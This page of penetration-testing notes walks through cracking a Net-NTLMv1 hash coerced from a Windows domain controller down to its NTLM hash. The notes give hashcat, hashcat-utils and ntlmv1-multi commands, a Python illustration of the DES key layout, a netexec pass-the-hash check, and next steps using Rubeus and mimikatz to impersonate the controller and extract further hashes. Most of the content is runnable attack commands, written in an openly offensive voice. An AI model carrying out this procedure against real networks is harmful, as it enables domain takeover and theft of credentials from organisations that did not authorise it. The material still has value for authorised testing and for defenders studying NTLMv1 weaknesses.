# ntlmv1-multi

> [!IMPORTANT]
> In January, Google/Mandiant released [this fantastic article](https://cloud.google.com/blog/topics/threat-intelligence/net-ntlmv1-deprecation-rainbow-tables) containing a [public release of Net-NTLMv1 Rainbow Tables](https://research.google/resources/datasets/?dataset_types=other&search=Net-NTLMv1&) to *"underscore the urgency of migrating away from this outdated protocol"* and, to us hackers, make our crack jobs faster!

As discussed in [7MS #591](https://7minsec.com/blog/2023/09/29/7ms-591-tales-of-pentest-pwnage-part-52/) (there's also a wonderful guide at [crack.sh](https://crack.sh/netntlm/)), this [tool](https://github.com/evilmog/ntlmv1-multi) is awesome for taking the downgraded (Net-NTLMv1) hashes you can coerce out of domain controllers (if the LAN Manager authentication level is set right (well...wrong)) and eventually cracking them down to the NTLM hash, which you can then use for passing/impersonating.

Starting at the point where you've captured a downgraded hash:

# Use ntlmv1-multi to parse the hash

```
sudo python3 /opt/ntlmv1-multi/ntlmv1.py --ntlmv1 THE-HASH-YOU-GOT-FROM-RESPONDER
```

# Prep hash for cracking
As a first step, get the hash ready for hashcat mode 14000: one line per DES block, in the `ciphertext:challenge` form that ntlmv1-multi prints (we recommend doing the cracking somewhere with some horsepower, like [vast.ai](https://vast.ai)):
```
echo "14B8DF571CF877A8:1122334455667788">>14000.hash
echo "7CEAB088CDD16386:1122334455667788">>14000.hash
```

# Crack the hash!
```
./hashcat -m 14000 -a 3 -1 charsets/DES_full.charset --hex-charset 14000.hash ?1?1?1?1?1?1?1?1
```
:::tip
*On a [vast.ai](https://vast.ai) instance, the `DES_full.charset` might actually be in `/hashcat/charsets/DES_full.hcchr`*
:::

The results will look something like this:

```
14B8DF571CF877A8:1122334455667788:$HEX[STRING1]
7CEAB088CDD16386:1122334455667788:$HEX[STRING2]
```

# Convert DES keys to NTLM keys
In the previous step, the `STRING1` and `STRING2` values are DES keys and not NTLM keys, so we need to convert them using `deskey_to_ntlm.pl` which comes with [hashcat-utils](https://github.com/hashcat/hashcat-utils).

```
deskey_to_ntlm.pl STRING1
deskey_to_ntlm.pl STRING2
```

Let's call the output of these operations `STRING1NTLM` and `STRING2NTLM` going forward.

:::tip
*On a [vast.ai](https://vast.ai) instance, the `deskey_to_ntlm.pl` might be in `/hashcat-utils/src/deskey_to_ntlm`*
:::

# Calculate the last 4 characters of the hash
```
./ct3_to_ntlm.bin 8819D23E095B0097 1122334455667788
LAST4
```
In the example above, `8819D23E095B0097` is the third ciphertext block from the parsed hash, `1122334455667788` is the challenge, and `LAST4` represents the output of `./ct3_to_ntlm.bin 8819D23E095B0097 1122334455667788`.

:::tip
*On a [vast.ai](https://vast.ai) instance, the `ct3_to_ntlm.bin` might be located in `~/hashcat-utils/src`*
:::

# Putting it all together
Now that you have `STRING1NTLM`, `STRING2NTLM` and `LAST4`, put them all together to make the NTLM hash of the domain controller!

```
STRING1NTLMSTRING2NTLMLAST4
```
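Why the three steps above recover the NT hash, as an added stand-alone Python illustration (not code from hashcat-utils, ntlmv1-multi or the original notes): MS-NLMP builds the NTLMv1 response by padding the 16-byte NT hash to 21 bytes, cutting it into three 7-byte chunks and expanding each into an 8-byte DES key that encrypts the challenge, so the two cracked `$HEX[...]` values are DES keys 1 and 2 with parity bits, and key 3 carries only two unknown hash bytes. The sample NT hash below is the widely published hash of the empty password, used here as a constructed input.

```python
# Added illustration of the NTLMv1 (MS-NLMP "DESL") key layout; stdlib only.

def ntlm_chunk_to_des_key(chunk7: bytes) -> bytes:
    """Expand 7 hash bytes to the 8-byte DES key form (7 key bits + odd parity per byte)."""
    assert len(chunk7) == 7
    bits = int.from_bytes(chunk7, "big")
    key = bytearray()
    for i in range(8):
        b = ((bits >> (49 - 7 * i)) & 0x7F) << 1   # 7 key bits into the high bits
        if bin(b).count("1") % 2 == 0:              # odd parity goes in the low bit
            b |= 1
        key.append(b)
    return bytes(key)


def des_key_to_ntlm_chunk(key8: bytes) -> bytes:
    """Inverse: drop the parity bit of each byte (what deskey_to_ntlm.pl does)."""
    assert len(key8) == 8
    bits = 0
    for b in key8:
        bits = (bits << 7) | (b >> 1)
    return bits.to_bytes(7, "big")


def ntlm_hash_to_des_keys(nt_hash: bytes) -> list[bytes]:
    """The three DES keys a client derives from its NT hash before encrypting the challenge."""
    assert len(nt_hash) == 16
    padded = nt_hash + b"\x00" * 5                  # 21 bytes -> three 7-byte chunks
    return [ntlm_chunk_to_des_key(padded[i:i + 7]) for i in (0, 7, 14)]


def reassemble_ntlm(string1_hex: str, string2_hex: str, last4_hex: str) -> str:
    """STRING1NTLM + STRING2NTLM + LAST4, i.e. the 'putting it all together' step."""
    head = des_key_to_ntlm_chunk(bytes.fromhex(string1_hex))
    mid = des_key_to_ntlm_chunk(bytes.fromhex(string2_hex))
    return (head + mid).hex() + last4_hex.lower()


if __name__ == "__main__":
    # Constructed sample: the NT hash of the empty password (a widely published value).
    nt_hash = bytes.fromhex("31d6cfe0d16ae931b73c59d7e0c089c0")
    k1, k2, k3 = ntlm_hash_to_des_keys(nt_hash)
    print("DES key 1:", k1.hex(), "DES key 2:", k2.hex(), "DES key 3:", k3.hex())
    # Only hash bytes 14..15 feed key 3; its last five bytes are always 0x01 (zero + parity),
    # which is why ct3_to_ntlm.bin has just 2**16 candidates to try for LAST4.
    print("key 3 fixed suffix:", k3[3:].hex())
    print("reassembled:", reassemble_ntlm(k1.hex(), k2.hex(), nt_hash[14:].hex()))
```

The round trip also shows that the cracked DES keys are worth exactly 7 bytes of NT hash each, which is why the final assembly is `STRING1NTLM` (14 hex) + `STRING2NTLM` (14 hex) + `LAST4` (4 hex) = 32 hex characters.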

## Sanity check
Once you have all the pieces assembled you can sanity check your work with netexec:
```
nxc smb domain.com -u DC01$ -H 'NTLM-HASH-YOU-ASSEMBLED'
```

# Next steps
Now you can use [Rubeus](/pentesting/Internal/rubeus) to do an `asktgt` using the RC4 value (`STRING1NTLMSTRING2NTLMLAST4`) and then pass it with Rubeus and `/ptt`, and then use [mimikatz](/pentesting/Internal/mimikatz) to extract important hashes!
